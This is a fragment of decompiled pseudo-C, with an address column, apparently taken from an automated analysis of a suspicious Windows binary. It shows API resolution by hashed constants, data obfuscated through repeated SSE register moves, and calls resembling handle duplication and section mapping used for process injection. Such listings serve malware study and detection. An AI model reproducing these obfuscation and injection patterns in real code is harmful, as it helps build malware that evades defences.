												_t368 = E6E7915C0(0xa1310f65, 0xf1c64384);
												 *((intOrPtr*)(_t835 + 0x464)) = _v308;
												_v1816 = _t368;
												 *((intOrPtr*)(_t835 + 0x468)) =  *((intOrPtr*)(_t835 + 0xa98));
												E6E7A9710( &_v368,  &_v2960, 0x47c);
												_push(_t835 + 0xa60);
												_push(0x4bc);
												_t785 =  &_v392;
												_t370 = E6E78E900(_t595,  &_v392);
											} else {
												E6E790B70(_t834 + 0x4c0, 0, 0x4f0);
												_t838 = _t834 + 0xc;
												_v608 = E6E7A9650(_t812);
												 *((intOrPtr*)( &_v384 - 0xe8)) = 0x56473829;
												_push(0);
												E6E7A9350( &_v384);
												 *((intOrPtr*)(_t838 + 0x40)) = 0x3b4caff7;
												asm("pxor xmm0, xmm0");
												asm("movq [esp+0x48], xmm0");
												E6E7A9670( &_v388, E6E7A9650( &_v388) + 0x10);
												E6E7A9640( &_v392, E6E7A9650( &_v392) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x9cac62c7;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v396, E6E7A9650( &_v396) + 0x10);
												E6E7A9640( &_v400, E6E7A9650( &_v400) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2820 = 0xa8f2638d;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670(_t838 + 0x9b4, E6E7A9650(_t838 + 0x9b0) + 0x10);
												E6E7A9640( &_v408, E6E7A9650( &_v408) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd8cc7390;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v412, E6E7A9650( &_v412) + 0x10);
												E6E7A9640( &_v416, E6E7A9650( &_v416) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xd16c9225;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v420, E6E7A9650( &_v420) + 0x10);
												E6E7A9640(_t838 + 0x9b4, E6E7A9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x649746ec;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v428, E6E7A9650( &_v428) + 0x10);
												E6E7A9640( &_v432, E6E7A9650( &_v432) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xe5ef1afa;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v436, E6E7A9650( &_v436) + 0x10);
												E6E7A9640(_t838 + 0x9b4, E6E7A9650(_t838 + 0x9b0) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2860 = 0x58d59bc9;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v444, E6E7A9650( &_v444) + 0x10);
												E6E7A9640( &_v448, E6E7A9650( &_v448) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2868 = 0x35b39b2b;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v452, E6E7A9650( &_v452) + 0x10);
												E6E7A9640( &_v456, E6E7A9650( &_v456) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2876 = 0xe9fbf3a8;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v460, E6E7A9650( &_v460) + 0x10);
												E6E7A9640( &_v464, E6E7A9650( &_v464) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2884 = 0xbcd9ca71;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v468, E6E7A9650( &_v468) + 0x10);
												E6E7A9640( &_v472, E6E7A9650( &_v472) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x4faea65b;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v476, E6E7A9650( &_v476) + 0x10);
												E6E7A9640( &_v480, E6E7A9650( &_v480) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0xc0b67de0;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v484, E6E7A9650( &_v484) + 0x10);
												E6E7A9640( &_v488, E6E7A9650( &_v488) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2908 = 0x996e050f;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v492, E6E7A9650( &_v492) + 0x10);
												E6E7A9640( &_v496, E6E7A9650( &_v496) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												_v2916 = 0x81c9e4a7;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v500, E6E7A9650( &_v500) + 0x10);
												E6E7A9640( &_v504, E6E7A9650( &_v504) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x97abe05f;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v508, E6E7A9650( &_v508) + 0x10);
												E6E7A9640( &_v512, E6E7A9650( &_v512) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("pxor xmm1, xmm1");
												asm("movups [eax], xmm0");
												 *((intOrPtr*)(_t838 + 0x40)) = 0x82d274c4;
												asm("movq [esp+0x48], xmm1");
												E6E7A9670( &_v516, E6E7A9650( &_v516) + 0x10);
												__eflags = E6E7A9650( &_v520) + 0xfffffff0;
												E6E7A9640( &_v520, E6E7A9650( &_v520) + 0xfffffff0);
												asm("movups xmm0, [esp+0x40]");
												asm("movups [eax], xmm0");
												E6E7B1270(0x588ab3ea,  &_v524);
												E6E7A9640( &_v524, 0x10);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x910], xmm0");
												E6E7A9640( &_v528, 0x20);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x918], xmm0");
												E6E7A9640( &_v532, 0x30);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x920], xmm0");
												E6E7A9640( &_v536, 0x40);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x928], xmm0");
												E6E7A9640( &_v540, 0x50);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x930], xmm0");
												E6E7A9640( &_v544, 0x60);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x938], xmm0");
												E6E7A9640( &_v548, 0x70);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x940], xmm0");
												E6E7A9640( &_v552, 0x80);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x948], xmm0");
												E6E7A9640( &_v556, 0x90);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x950], xmm0");
												E6E7A9640( &_v560, 0xa0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x958], xmm0");
												E6E7A9640( &_v564, 0xb0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x960], xmm0");
												E6E7A9640( &_v568, 0xc0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x968], xmm0");
												E6E7A9640( &_v572, 0xd0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x970], xmm0");
												E6E7A9640( &_v576, 0xe0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x978], xmm0");
												E6E7A9640( &_v580, 0xf0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x980], xmm0");
												E6E7A9640( &_v584, 0x100);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x988], xmm0");
												E6E7A9640( &_v588, 0);
												asm("movq xmm0, [eax+0x8]");
												_t819 =  &_v544;
												asm("movdqu [esp+0x60], xmm0");
												E6E790B70( &_v544, 0, 0x30);
												_t835 = _t838 + 0xc;
												asm("movd xmm4, edi");
												asm("cdq");
												asm("pxor xmm0, xmm0");
												asm("movdqu [eax-0x950], xmm0");
												_v2992 = _t803;
												asm("movd xmm1, edx");
												asm("cdq");
												asm("movd xmm3, eax");
												asm("punpckldq xmm4, xmm1");
												asm("movd xmm2, edx");
												asm("punpckldq xmm3, xmm2");
												asm("movdqu [esp+0x70], xmm3");
												asm("movdqu [eax-0x960], xmm4");
												_v2988 = _t595;
												do {
													asm("movdqu xmm0, [esp+0x60]");
													asm("movq [esp], xmm0");
													asm("pxor xmm5, xmm5");
													_v2860 = 6;
													asm("movdqu xmm1, [esp+0x80]");
													asm("movq [esp+0xc], xmm1");
													asm("movdqu xmm2, [esp+0x90]");
													asm("movq [esp+0x14], xmm2");
													asm("movq [esp+0x1c], xmm5");
													asm("movdqu xmm3, [esp+0x70]");
													asm("movq xmm4, [0x6e7b93d8]");
													asm("movq [esp+0x24], xmm3");
													asm("movq [esp+0x2c], xmm4");
													asm("movq [esp+0x34], xmm5");
													_t599 = E6E7B04B0(_t803, _t819);
													_t803 =  *(_t835 + 0x9e0);
													_t819 =  *((intOrPtr*)(_t835 + 0x9e4));
													asm("movq xmm0, [esp+0x9f8]");
													__eflags =  ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819;
													asm("movdqu xmm1, [esp+0x90]");
													asm("paddq xmm1, xmm0");
													asm("movdqu [esp+0x90], xmm1");
													if(( ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819) != 0) {
														goto L35;
													} else {
														_push(0x400);
														E6E7A9350( &_v356);
														 *(_t835 + 0x5c) = E6E7A9640(_t835 + 0x9d4, 0);
														 *((intOrPtr*)(_t835 + 0x58)) = E6E7A9640(_t835 + 0x9d4, 0);
														E6E7A9650( &_v368);
														asm("movdqu xmm0, [esp+0x60]");
														asm("movd xmm6, ecx");
														asm("movq [esp], xmm0");
														_v2872 = 6;
														asm("pxor xmm7, xmm7");
														asm("movdqu xmm1, [esp+0x80]");
														asm("movq xmm2, [0x6e7b93d0]");
														asm("movq [esp+0xc], xmm1");
														_v2860 = _t803;
														 *((intOrPtr*)(_t835 + 0x18)) = _t819;
														asm("movq [esp+0x1c], xmm2");
														asm("cdq");
														asm("movd xmm4, eax");
														asm("movd xmm3, edx");
														asm("cdq");
														asm("punpckldq xmm4, xmm3");
														asm("movq [esp+0x24], xmm4");
														asm("movd xmm5, edx");
														asm("punpckldq xmm6, xmm5");
														asm("movq [esp+0x2c], xmm6");
														asm("movq [esp+0x34], xmm7");
														_t562 = E6E7B04B0(_t803, _t819);
														__eflags = _t562;
														if(_t562 != 0) {
															L56:
															E6E7A9510(_t835 + 0x9d0);
															_t803 = 0xe5ab9b45;
														} else {
															__eflags =  *( *(_t835 + 0x5c)) & 0x0000ffff;
															if(__eflags == 0) {
																goto L56;
															} else {
																E6E7983B0(_t835 + 0xa28);
																_t819 = _t835 + 0xa30;
																E6E7A2E60(_t835 + 0xa30, __eflags, _t835 + 0xa30, 0x5c);
																E6E7A1020(_t835 + 0xa30, _t835 + 0xa38);
																_t571 = E6E7AD620( *((intOrPtr*)(_t835 + 0xa38)), E6E7A6040( *((intOrPtr*)(_t835 + 0xa38)), 0x7fffffff));
																E6E7A0B10(_t835 + 0xa38);
																E6E7A0B10(_t835 + 0xa30);
																E6E7A0B10(_t835 + 0xa28);
																E6E7A9510( &_v372);
																_t803 = _t571 ^ 0x38ba5c7b;
																__eflags = _t803;
															}
														}
														__eflags = _t803 - 0xa1310f65;
														if(__eflags == 0) {
															_t803 =  *(_t835 + 0x50);
															_t595 =  *(_t835 + 0x54);
															_t820 =  *(_t835 + 0x9e0);
															 *((intOrPtr*)(_t835 + 0x58)) =  *((intOrPtr*)(_t835 + 0x9e4));
														} else {
															goto L35;
														}
													}
													L37:
													E6E78DE60( &_v372, _t803, __eflags, _t820,  *((intOrPtr*)(_t835 + 0x58)));
													E6E7AA110( &_v396);
													 *((intOrPtr*)(_t835 + 0x40)) = 0xe2d27ff4;
													asm("pxor xmm0, xmm0");
													asm("movq [esp+0x48], xmm0");
													E6E7A9670( &_v396, E6E7A9650( &_v396) + 0x10);
													E6E7A9640( &_v400, E6E7A9650( &_v400) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													_v2820 = 0x69121530;
													asm("movq [esp+0x48], xmm1");
													E6E7A9670(_t835 + 0x9b4, E6E7A9650(_t835 + 0x9b0) + 0x10);
													E6E7A9640( &_v408, E6E7A9650( &_v408) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0x77be1f6;
													asm("movq [esp+0x48], xmm1");
													E6E7A9670( &_v412, E6E7A9650( &_v412) + 0x10);
													E6E7A9640( &_v416, E6E7A9650( &_v416) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0xf1c64384;
													asm("movq [esp+0x48], xmm1");
													E6E7A9670( &_v420, E6E7A9650( &_v420) + 0x10);
													__eflags = E6E7A9650(_t835 + 0x9b0) + 0xfffffff0;
													E6E7A9640(_t835 + 0x9b4, E6E7A9650(_t835 + 0x9b0) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													_push( &_v428);
													_push(_v2820);
													_push(_t820);
													asm("movups [edx], xmm0");
													E6E78E780( &_v412, _t820, __eflags);
													E6E7A9640(_t835 + 0x9b4, 0);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x998], xmm0");
													E6E7A9640( &_v444, 0x10);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x9a0], xmm0");
													E6E7A9640( &_v448, 0x20);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x990], xmm0");
													E6E7A9640( &_v452, 0x30);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [ecx-0x18], xmm0");
													E6E7A9510(_t835 + 0x9c0);
													E6E7A9510( &_v456);
													asm("cdq");
													asm("movd xmm1, eax");
													asm("movd xmm0, edx");
													asm("cdq");
													asm("movd xmm3, eax");
													asm("punpckldq xmm1, xmm0");
													asm("movq [esp+0x900], xmm1");
													asm("movd xmm2, edx");
													asm("punpckldq xmm3, xmm2");
													asm("movq [esp+0x908], xmm3");
													E6E7A9710( &_v280, _t835 + 0x4c4, 0x4f0);
													_t785 = _t835 + 0xa58;
													_t370 = E6E78ACD0(_t595, _t835 + 0xa58, __eflags, 0x5c8,  &_v288);
													goto L38;
													L35:
													__eflags = _t599;
												} while (_t599 == 0);
												_t820 = 0;
												__eflags = 0;
												_t803 =  *(_t835 + 0x50);
												_t595 =  *(_t835 + 0x54);
												 *((intOrPtr*)(_t835 + 0x58)) = 0;
												goto L37;
											}
											L38:
											_t817 = _t370;
											__eflags = _t817;
											if(_t817 != 0) {
												__eflags = _t595;
												_push(0);
												_t597 =  !=  ? _t595 + 0xc : _t595;
												_push( !=  ? _t595 + 0xc : _t595);
												_t387 = E6E7B1A80(_t785, _t595,  &_v296, 0x2710);
												_t835 = _t835 + 0x10;
												_t595 = 0;
												__eflags = _t387;
												_t817 =  !=  ? 0 : _t817;
											}
											__eflags = _v160;
											if(_v160 == 0) {
												L45:
												__eflags = _v156;
												if(_v156 == 0) {
													L50:
													E6E7B2530(_t595,  &_v296, _t785, _t803, _t817);
													E6E7A9510( &_v216);
													E6E7A9510(_t835 + 0xa50);
													E6E7A9510( &_v248);
													E6E7B1F40( &_v152, _t785, _t817);
													return _t817;
												} else {
													_t785 = E6E7915C0(0x588ab3ea, 0xea812079);
													__eflags = _t785;
													if(_t785 != 0) {
														_t595 = 0;
														__eflags = 0;
														 *_t785(_t803, _v156, 0xffffffff,  &_v176, 0, 0, 1);
													}
													_t379 = E6E7915C0(0x588ab3ea, 0x35b39b2b);
													__eflags = _t379;
													if(_t379 == 0) {
														goto L50;
													} else {
														_push(_v176);
														asm("int3");
														return _t379;
													}
												}
											} else {
												_t785 = E6E7915C0(0x588ab3ea, 0xea812079);
												__eflags = _t785;
												if(_t785 != 0) {
													_t595 = 0;
													__eflags = 0;
													 *_t785(_t803, _v160, 0xffffffff,  &_v176, 0, 0, 1);
												}
												_t383 = E6E7915C0(0x588ab3ea, 0x35b39b2b);
												__eflags = _t383;
												if(_t383 == 0) {
													goto L45;
												} else {
													_push(_v176);
													asm("int3");
													return _t383;
												}
											}
										} else {
											_t783 = _t833 + 0x4bc;
											 *_t621(0xffffffff, _v276, _t803, _t833 + 0x4bc, 0, 0, 2);
											__eflags = 0;
											if(0 == 0) {
												goto L26;
											} else {
												__eflags = _v196;
												if(_v196 != 0) {
													E6E7ABE30(_t833 + 0xa78, _t812);
												}
												__eflags = _v168;
												if(_v168 == 0) {
													goto L54;
												} else {
													_t585 = E6E7915C0(0x588ab3ea, 0xea812079);
													__eflags = _t585;
													if(_t585 == 0) {
														_t586 = E6E7915C0(0x588ab3ea, 0x35b39b2b);
														__eflags = _t586;
														if(_t586 == 0) {
															goto L54;
														} else {
															_push( *(_t833 + 0x40));
															asm("int3");
															return _t586;
														}
													} else {
														__eflags = 0;
														_push(1);
														_push(0);
														_push(0);
														_push(_t833 + 0x40);
														_push(0xffffffff);
														_push(_v168);
														_push(_t803);
														asm("int3");
														return _t585;
													}
												}
											}
										}
									} else {
										_t783 = _t833 + 0x4bc;
										 *_t620(0xffffffff, _v172, _t803, _t833 + 0x4bc, 0, 0, 2);
										__eflags = 0;
										if(0 == 0) {
											goto L17;
										} else {
											__eflags = _v196;
											if(_v196 != 0) {
												goto L53;
											} else {
											}
											goto L54;
										}
									}
								} else {
									_push(_v160);
									_push(0xffffffff);
									asm("int3");
									return _t329;
								}
							}
						} else {
							__eflags = _v128;
							if(_v128 != 0) {
								L53:
								E6E7ABE30(_t833 + 0xa78, _t812);
							} else {
							}
							L54:
							E6E7B2530(_t595, _t833 + 0xa10, _t783, _t803, _t812);
							E6E7A9510( &_v224);
							E6E7A9510( &_v240);
							E6E7A9510(_t833 + 0xa40);
							E6E7B1F40( &_v160, _t783, _t812);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = 0;
						_push(0);
						_push(0x8000000);
						_push(4);
						_push(_t833 + 0xa90);
						_push(0);
						_push(0xf001f);
						_push(_t833 + 0xaa4);
						asm("int3");
						return _t317;
					}
				} else {
					E6E7B1F40( &_v72, 0x1d, _t812);
					return 1;
				}
			}

0x6e781571
0x6e781577
0x6e781579
0x6e78157f
0x6e781581
0x6e781592
0x6e781597
0x6e7815a7
0x6e7815b3
0x6e7815c8
0x6e7815e8
0x6e7815f1
0x6e7815f6
0x6e7815ff
0x6e781604
0x6e78160d
0x6e781612
0x6e781614
0x6e781617
0x6e78161a
0x6e78161f
0x6e781621
0x6e781625
0x6e78162a
0x6e78162a
0x6e78162f
0x6e781631
0x6e781634
0x6e781639
0x6e78163a
0x6e781642
0x6e781644
0x6e781649
0x6e781654
0x6e781658
0x6e781660
0x6e781670
0x6e781681
0x6e781686
0x6e781688
0x6e7816b2
0x6e7816c8
0x6e7816cd
0x6e7816d2
0x6e7816e9
0x6e7816f0
0x6e7816f7
0x6e7816fe
0x6e781714
0x6e781716
0x6e781718
0x6e7826f9
0x6e7826fd
0x6e782701
0x6e782706
0x6e78270c
0x6e782737
0x6e78273b
0x6e78273d
0x6e78273f
0x00000000
0x6e782745
0x6e782745
0x6e78274d
0x00000000
0x00000000
0x00000000
0x6e78274d
0x6e78171e
0x6e78171e
0x6e781727
0x6e78173e
0x6e781743
0x6e781750
0x6e781755
0x6e781757
0x6e781764
0x6e78177e
0x6e781780
0x6e781782
0x6e7817b5
0x6e7817bc
0x6e7817d2
0x6e7817d4
0x6e7817d6
0x6e78186a
0x6e781871
0x6e781878
0x6e781880
0x6e781889
0x6e781889
0x6e781895
0x6e7818a2
0x6e7818a4
0x6e7818a7
0x6e7818b0
0x6e7818c3
0x6e7818cf
0x6e7818e8
0x6e7818fb
0x6e781912
0x6e781917
0x6e78191c
0x6e781921
0x6e781924
0x6e7827e7
0x6e7827ec
0x6e7827f6
0x6e7827fd
0x6e782817
0x6e78282d
0x6e782843
0x6e782859
0x6e78286f
0x6e782885
0x6e78289b
0x6e7828b1
0x6e7828c7
0x6e7828dd
0x6e7828f3
0x6e782909
0x6e78291f
0x6e782935
0x6e78294b
0x6e782961
0x6e782977
0x6e78298d
0x6e7829a3
0x6e7829b4
0x6e7829c0
0x6e7829ce
0x6e7829d5
0x6e7829ed
0x6e7829fb
0x6e7829fc
0x6e782a01
0x6e782a08
0x6e78192a
0x6e781939
0x6e78193e
0x6e781948
0x6e781956
0x6e781960
0x6e781962
0x6e781967
0x6e781976
0x6e78197a
0x6e781990
0x6e7819ac
0x6e7819b1
0x6e7819bd
0x6e7819c1
0x6e7819c4
0x6e7819cc
0x6e7819e2
0x6e7819fe
0x6e781a03
0x6e781a0f
0x6e781a13
0x6e781a16
0x6e781a1e
0x6e781a34
0x6e781a50
0x6e781a55
0x6e781a61
0x6e781a65
0x6e781a68
0x6e781a70
0x6e781a86
0x6e781aa2
0x6e781aa7
0x6e781ab3
0x6e781ab7
0x6e781aba
0x6e781ac2
0x6e781ad8
0x6e781af4
0x6e781af9
0x6e781b05
0x6e781b09
0x6e781b0c
0x6e781b14
0x6e781b2a
0x6e781b46
0x6e781b4b
0x6e781b57
0x6e781b5b
0x6e781b5e
0x6e781b66
0x6e781b7c
0x6e781b98
0x6e781b9d
0x6e781ba9
0x6e781bad
0x6e781bb0
0x6e781bb8
0x6e781bce
0x6e781bea
0x6e781bef
0x6e781bfb
0x6e781bff
0x6e781c02
0x6e781c0a
0x6e781c20
0x6e781c3c
0x6e781c41
0x6e781c4d
0x6e781c51
0x6e781c54
0x6e781c5c
0x6e781c72
0x6e781c8e
0x6e781c93
0x6e781c9f
0x6e781ca3
0x6e781ca6
0x6e781cae
0x6e781cc4
0x6e781ce0
0x6e781ce5
0x6e781cf1
0x6e781cf5
0x6e781cf8
0x6e781d00
0x6e781d16
0x6e781d32
0x6e781d37
0x6e781d43
0x6e781d47
0x6e781d4a
0x6e781d52
0x6e781d68
0x6e781d84
0x6e781d89
0x6e781d95
0x6e781d99
0x6e781d9c
0x6e781da4
0x6e781dba
0x6e781dd6
0x6e781ddb
0x6e781de7
0x6e781deb
0x6e781dee
0x6e781df6
0x6e781e0c
0x6e781e28
0x6e781e2d
0x6e781e39
0x6e781e3d
0x6e781e40
0x6e781e48
0x6e781e5e
0x6e781e7a
0x6e781e7f
0x6e781e8b
0x6e781e8f
0x6e781e92
0x6e781e9a
0x6e781eb0
0x6e781ec1
0x6e781ecc
0x6e781ed1
0x6e781ee2
0x6e781ee5
0x6e781ef3
0x6e781ef8
0x6e781efd
0x6e781f0f
0x6e781f14
0x6e781f19
0x6e781f2b
0x6e781f30
0x6e781f35
0x6e781f47
0x6e781f4c
0x6e781f51
0x6e781f63
0x6e781f68
0x6e781f6d
0x6e781f7f
0x6e781f84
0x6e781f89
0x6e781f9b
0x6e781fa0
0x6e781fa5
0x6e781fba
0x6e781fbf
0x6e781fc4
0x6e781fd9
0x6e781fde
0x6e781fe3
0x6e781ff8
0x6e781ffd
0x6e782002
0x6e782017
0x6e78201c
0x6e782021
0x6e782036
0x6e78203b
0x6e782040
0x6e782055
0x6e78205a
0x6e78205f
0x6e782074
0x6e782079
0x6e78207e
0x6e782093
0x6e782098
0x6e78209d
0x6e7820b2
0x6e7820b7
0x6e7820bc
0x6e7820ce
0x6e7820d3
0x6e7820d8
0x6e7820df
0x6e7820ea
0x6e7820ef
0x6e7820f4
0x6e7820f8
0x6e7820f9
0x6e782104
0x6e78210c
0x6e782110
0x6e782114
0x6e782115
0x6e782119
0x6e78211d
0x6e782121
0x6e782125
0x6e78212b
0x6e782133
0x6e782137
0x6e782137
0x6e78213d
0x6e782142
0x6e782146
0x6e78214e
0x6e782157
0x6e78215d
0x6e782166
0x6e78216c
0x6e782172
0x6e782178
0x6e782180
0x6e782186
0x6e78218c
0x6e782197
0x6e7821ab
0x6e7821b4
0x6e7821bd
0x6e7821c6
0x6e7821c8
0x6e7821d1
0x6e7821d5
0x6e7821de
0x00000000
0x6e7821e4
0x6e7821e4
0x6e7821f0
0x6e782203
0x6e782215
0x6e782220
0x6e782227
0x6e78222d
0x6e782231
0x6e782236
0x6e78223e
0x6e782242
0x6e78224b
0x6e782253
0x6e782259
0x6e78225d
0x6e782261
0x6e78226b
0x6e78226c
0x6e782272
0x6e782276
0x6e782277
0x6e78227b
0x6e782281
0x6e782285
0x6e782289
0x6e78228f
0x6e782295
0x6e78229a
0x6e78229c
0x6e7827c5
0x6e7827cc
0x6e7827d1
0x6e7822a2
0x6e7822a9
0x6e7822ab
0x00000000
0x6e7822b1
0x6e7822bb
0x6e7822c0
0x6e7822d1
0x6e7822e0
0x6e7822fc
0x6e78230a
0x6e782311
0x6e78231d
0x6e782329
0x6e78232e
0x6e78232e
0x6e78232e
0x6e7822ab
0x6e782334
0x6e78233a
0x6e7827ad
0x6e7827b1
0x6e7827b5
0x6e7827bc
0x00000000
0x00000000
0x00000000
0x6e78233a
0x6e782356
0x6e782364
0x6e782370
0x6e782375
0x6e782384
0x6e782388
0x6e78239e
0x6e7823ba
0x6e7823bf
0x6e7823cb
0x6e7823cf
0x6e7823d2
0x6e7823da
0x6e7823f0
0x6e78240c
0x6e782411
0x6e78241d
0x6e782421
0x6e782424
0x6e78242c
0x6e782442
0x6e78245e
0x6e782463
0x6e78246f
0x6e782473
0x6e782476
0x6e78247e
0x6e782494
0x6e7824a5
0x6e7824b0
0x6e7824b7
0x6e7824c3
0x6e7824c4
0x6e7824c8
0x6e7824c9
0x6e7824d5
0x6e7824e3
0x6e7824e8
0x6e7824ed
0x6e7824ff
0x6e782504
0x6e782509
0x6e78251b
0x6e782520
0x6e782525
0x6e782537
0x6e78253c
0x6e782548
0x6e78254d
0x6e782559
0x6e782565
0x6e782566
0x6e782571
0x6e782575
0x6e782576
0x6e78257a
0x6e78257e
0x6e782587
0x6e78258b
0x6e78258f
0x6e7825ac
0x6e7825c0
0x6e7825c7
0x00000000
0x6e782340
0x6e782340
0x6e782340
0x6e782348
0x6e782348
0x6e78234a
0x6e78234e
0x6e782352
0x00000000
0x6e782352
0x6e7825cc
0x6e7825cc
0x6e7825d0
0x6e7825d2
0x6e7825d4
0x6e7825d9
0x6e7825db
0x6e7825de
0x6e7825ec
0x6e7825f1
0x6e7825f4
0x6e7825f6
0x6e7825f8
0x6e7825f8
0x6e7825fb
0x6e782603
0x6e782650
0x6e782650
0x6e782658
0x6e7826a5
0x6e7826ac
0x6e7826b8
0x6e7826c4
0x6e7826d0
0x6e7826dc
0x6e7826ef
0x6e78265a
0x6e782669
0x6e78266b
0x6e78266d
0x6e78266f
0x6e78266f
0x6e782687
0x6e782687
0x6e782693
0x6e782698
0x6e78269a
0x00000000
0x6e78269c
0x6e78269c
0x6e7826a3
0x6e7826a4
0x6e7826a4
0x6e78269a
0x6e782605
0x6e782614
0x6e782616
0x6e782618
0x6e78261a
0x6e78261a
0x6e782632
0x6e782632
0x6e78263e
0x6e782643
0x6e782645
0x00000000
0x6e782647
0x6e782647
0x6e78264e
0x6e78264f
0x6e78264f
0x6e782645
0x6e7817dc
0x6e7817de
0x6e7817f4
0x6e7817f6
0x6e7817f8
0x00000000
0x6e7817fa
0x6e7817fa
0x6e781802
0x6e78180b
0x6e78180b
0x6e781810
0x6e781818
0x00000000
0x6e78181e
0x6e781828
0x6e78182d
0x6e78182f
0x6e781852
0x6e781857
0x6e781859
0x00000000
0x6e78185f
0x6e78185f
0x6e781863
0x6e781864
0x6e781864
0x6e781831
0x6e781831
0x6e781837
0x6e781839
0x6e78183a
0x6e78183b
0x6e78183c
0x6e78183e
0x6e781845
0x6e781846
0x6e781847
0x6e781847
0x6e78182f
0x6e781818
0x6e7817f8
0x6e781784
0x6e781786
0x6e78179c
0x6e78179e
0x6e7817a0
0x00000000
0x6e7817a2
0x6e7817a2
0x6e7817aa
0x00000000
0x00000000
0x6e7817b0
0x00000000
0x6e7817aa
0x6e7817a0
0x6e781759
0x6e781759
0x6e781760
0x6e781762
0x6e781763
0x6e781763
0x6e781757
0x6e7816d4
0x6e7816d4
0x6e7816dc
0x6e78274f
0x6e782756
0x00000000
0x6e7816e2
0x6e78275b
0x6e782762
0x6e78276e
0x6e78277a
0x6e782786
0x6e782792
0x6e782797
0x6e7827a5
0x6e7827a5
0x6e78168a
0x6e78168a
0x6e781693
0x6e781694
0x6e781699
0x6e78169b
0x6e78169c
0x6e78169d
0x6e7816a9
0x6e7816aa
